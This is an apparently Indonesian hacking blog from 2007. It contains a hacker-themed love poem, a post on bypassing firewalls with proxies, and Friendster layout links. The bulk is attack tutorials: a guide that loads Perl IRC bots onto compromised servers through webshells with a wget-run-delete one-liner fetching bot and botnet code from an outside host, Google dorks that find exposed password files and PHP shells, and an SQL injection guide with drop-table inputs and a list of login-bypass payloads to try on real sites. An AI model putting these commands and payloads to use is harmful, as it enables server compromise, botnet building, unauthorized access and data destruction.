Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk
mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku
c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang
anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku
seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection
Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di
hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.
apa aku harus pasang backdor "Remote Connect-Back Shell"jadi aku
tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti
ini.
Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku
akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu
aku akan pasang portsentry, dan menyeting error pagemu " The page
cannot be found Coz Has Been Owned by Someone get out!" aku janji gak
bakalan ada macelinious program atau service yang hidden, karena aku
sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus
menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, ...?
Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah
terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat
menangkalnya selain ...kamu.
Monday, November 12, 2007
Monday, November 5, 2007
Hide Your IP, Surf Anonymous
Internet has become a fountain of information that most people use on a daily basis for information, education, entertainment, work and play. Unfortunately, the convenience of the Internet also comes with hidden dangers. Online crimes are on the rise and are constantly evolving technologically.
With the web base proxy allows you to surf the world wide web safely and anonymously. In addition, this allows you to bypass Company/School firewalls and proxies, allowing you to browse your favourite blocked websites, such asmyspace.com and ebay.com at work or school, while your friends and colleagues cannot.
There is thousand of web proxy that you can use. Below are sample of proxies:
http://www.1freeproxy.com/
http://www.proxygalaxy.com/
http://www.pussyproxy.com/
http://www.freeproxyguru.com/
http://www.hotdogproxy.com/
With the web base proxy allows you to surf the world wide web safely and anonymously. In addition, this allows you to bypass Company/School firewalls and proxies, allowing you to browse your favourite blocked websites, such asmyspace.com and ebay.com at work or school, while your friends and colleagues cannot.
There is thousand of web proxy that you can use. Below are sample of proxies:
http://www.1freeproxy.com/
http://www.proxygalaxy.com/
http://www.pussyproxy.com/
http://www.freeproxyguru.com/
http://www.hotdogproxy.com/
Free Friendster Layouts
Dibawah ini adalah beberapa link untuk merubah code CSS atau mengkreasikan tampilan layout / skins friendster agar friendster kita terlihat lebih menarik.
http://www.pingafriend.com/
http://spider-layouts.com/
http://friendster-layouts.com/
http://www.friendsterlayouts.org/
http://www.freefriendsterskins.com/
http://friendster-skins.otezz.net/
http://www.friendstercode.net/
http://www.pyzam.com/friendsterlayouts
http://www.freecodesource.com/friendster-layouts/
http://www.pingafriend.com/
http://spider-layouts.com/
http://friendster-layouts.com/
http://www.friendsterlayouts.org/
http://www.freefriendsterskins.com/
http://friendster-skins.otezz.net/
http://www.friendstercode.net/
http://www.pyzam.com/friendsterlayouts
http://www.freecodesource.com/friendster-layouts/
Sunday, November 4, 2007
Buat bot perl dan botscan
Saking banyaknya bot perl sampai-sampai jadi binggung mau pakai yang mana.
ada yang botperl yang bisa scan trus bisa nmap, trus bisa juga di jadiin shell, banyak banget pilihannya……..
langsung aja dehh… pusing jadinya mikirin itu semuaa….
untuk load botperl peralatan yang sangat perlu adalah source botperlnya dan juga shell atau webshell yang ber-safe mode off.
kalau webshellnya ber-safe mode on, nggak bisa di gunakan untuk meload bot, soalnya nggak ada untuk memasukkan perintah, tapi lain halnya dengan menggunakan include. (lain waktu bahasnya yach…)
yang ber-safe mode on bisa di gunakan untuk membuat botphp dengan cara injek lihat cara buatnya di buat-bot-php-dengan-injekan dengan injekan.
kalau yang webshell safe mode off bisa untuk meload botperl karena ada untuk mengetikan perintah.
kalau udah ada source botperl dan juga target tinggal lanjutkan dengan meload bot.
sebenarnya masih banyak jalan untuk bisa meload bot, sama halnya dengan bot-bot yang lain.
yang lebih enak juga kalau udah ada web hosting sendiri sebagai penyimpanan data source code bot, atau juga injekan-injekannya sepeti r57shell, c99shell atau c100, dan juga GFSshell dEel El deh.
kalau memang nggak ada web hosting yach tinggal di buat aja ko, gampang banget, khan banyak situs gratis tuhh yach jadiin aja tuh tempat nyimpen data, khan enakk….. untuk web yang gratis dapat di lihat di free-web-hosting
singkatnya, yang di butuhkan adalah :
1. web/situs/webhosting.
untuk menyimpan source code, injekan, atau data lain.
2. source code botperl.
kalau nggak ada sourcenya, yach nggak jadi deh buatnya, paling botnya masuk chan orang lain kalau kamu load pake botorang lain 
.
3. shell/webshell.
kalau webshell yang ber-safe mode off.
kalau semua udah ada tinggal kerjaannya langsung atau loadbotnya langsung.
langkah kerjanya :
kalau untuk sekaligus menjalankannya.
wget http://henca.prohosts.org/chibot.txt;chmod 755 perl chibot.txt;perl chibot.txt;rm -rf chibot.txt;ls -la
kalau download sourcenya tidak bisa menggunakan wget, dapat juga dengan menggunakan :
lwp-download
curl
fetch
GET
untuk contohnya penggunaannya dengan cara :
lwp-download http://henca.prohosts.org/chibot.txt
curl -o botperl.txt http://henca.prohosts.org/chibot.txt atau curl -o http://henca.prohosts.org/chibot.txt
penggunaan pilihan -o untuk membuat nama file baru dengan nama botperl.txt
fetch http://henca.prohosts.org/chibot.txt
GET http://henca.prohosts.org/chibot.txt
untuk jelasnya dari cara diatas kalau satu-satu gini neh, cara di bawah ini sama dengan yang ada di atas. :
wget http://henca.prohosts.org/chibot.txt [enter]
chmod 755 perl chibot.txt [enter]
perl chibot.txt [enter]
rm -rf chibot.txt [enter]
ls -la [enter]
penjelasannya :
wget http://henca.prohosts.org/chibot.txt [enter] <– memasukkan sourcenya kedalam komputer/situs target
chmod 755 perl chibot.txt [enter] <— memberikan permision execute peda file chibot.txt, boleh juga nggak
perl chibot.txt [enter] <– menjalankan file bot dengan perintah perl karena itu file perl boleh juga ekstensinya *.pl
rm -rf chibot.txt [enter] <– menghapus file chibot.txt
ls -la [enter] <– melihat file
kalau mau menjalankan botperl yang khususnya, menggunakan webshell, harus di tempat yang permnya 777, supaya lebih leluasa wgetnya.
atau kita juga bisa pindah direktory ke /tmp atau dengan mengetikan cd yang di ikuti dengan perm 777 misalnya cd /tmp karena biasanya direktory /tmp permnya 777, tapi nggak semua server loh gitu, tergantung kalau emang kita beruntung.
kalau ada yang kurang ntar saya tambah, kayaknya neh tulisan belum sempurna…
namanya juga belajar khan.
oh iya nehh source botscannya ama botperl dan juga botnet.
http://scan.prohosts.org/main.txt <– Botscan yang baru
http://henca.prohosts.org/chibot.txt <– yang ini scanner shellbot
http://henca.prohosts.org/netdo.txt <– yang ini botnet
http://henca.prohosts.org/scan9.txt <— yang ini punya botscan morgan v9
http://scan.prohosts.org/botscan.txt <– yang ini botscan tapi versi lama
Friday, November 2, 2007
Google Hacking Tutorial
—————————————————
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan “Want to learn”, tidak
kepada pihak-pihak yang ingin merugikan orang lain.
—————————-[ Google Hacking ]—————————-
Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.
Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.
— Penggunaan Dasar ———————————————–
- Google tidak “case sensitive”.
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama
- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”
- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR c**c*er
Hasilnya pencarian akan mengandung kata “hacker” atau “c**c*er”
- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
“how” dan “where”. Jika kata-kata umum ini begitu penting, anda
bisa menambahkan “+” didepan keyword tersebut.
Keyword: hacker how ==> Kata “how” akan diabaikan
Keyword: hacker +how ==> Kata “how” akan diikutsertakan
- -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
“linus tanpa linux”, kita bisa menggunakan “linus -linux”
- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll
Google akan menghasilkan pencarian hanya yang mengandung kata
“menja”.
Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,
“menjadi white hacker”, dll.
- “”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”
Hasilnya pencarian akan mengandung kata “menjadi hacker”
- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3
— Operator Spesial ———————————————–
– Contoh hasil pencarian –
Google –> Judul
… Language Tools. Ways to help with tsunami relief ’
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 –> URL
– Contoh hasil pencarian –
- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman “Admin” dengan
deskripsi “Administrasi”
- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata “Admin” dan “Administrasi”
- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dengan deskripsi “Administrasi”
- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dan “Administrasi”
- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site “echo.or.id”
- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.
- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker
- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: “hacker” filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html
- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com
- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com
— Manipulasi URL Google ——————————————
> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aboleh-hacking.com&btnG=Search
> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aboleh-hacking.com&btnG=Search
> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL 
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aboleh-hacking.com&btnG=Search
> safe=off: arti dari variabel ini filter “SafeSearch” dimatikan. “SafeSearch”
untuk memfilter hasil pencarian sexual.
Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri
Karena bandwidth di Indonesia mahal ……..
Contoh script google.html lengkap dengan varabielnya.
— BOF google.html —
— EOF google.html —
Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda
Berikut merupakan script default pencarian google.
— BOF google.html —
— EOF google.html —
Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com
— Tips & Tricks ————————————————–
Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.
Ex:
- Keyword: site:boleh-hacking.com, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:boleh-hacking.com hacker, akan menghasilkan
semua site boleh-hacking.com yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education
Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size
inurl:”admin.mdb” -html
inurl:”password.mdb” -html
inurl:”data.mdb” -html
“phpMyAdmin” “running on” inurl:”main.php”
intitle:”PHP Shell” “Enable stderr” php
Masih banyak lagi keyword yang bisa ditemukan disini [5]
— Referensi ——————————————————
[1] http://www.google.com/help/basics.html
[2] http://www.google.com/help/features.html
[3] http://www.google.com/help/refinesearch.html
[4] http://www.google.com/help/interpret.html
[5] http://johnny.ihackstuff.com/
[6] O’Reilly - Google Hacks
DASAR-DASAR SQL INJECTION 1
*-----------------------------------------------------------*
| DASAR-DASAR SQL INJECTION 1 |
*-----------------------------------------------------------*
* by : the_day ;the_day@echo.or.id *
| Greetz to echo staf : y3dips,moby,comex;SARAH |
* *
*-----------------------------------------------------------*
Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .
-----------------------------------------------------------------------------------------------------------------------
Sumber Bacca : http://securityfocus.com/articles/SQLinjectionBasicTutorial.php
http://www.securiteam.com/securityreviews
Subscribe to:
Posts (Atom)
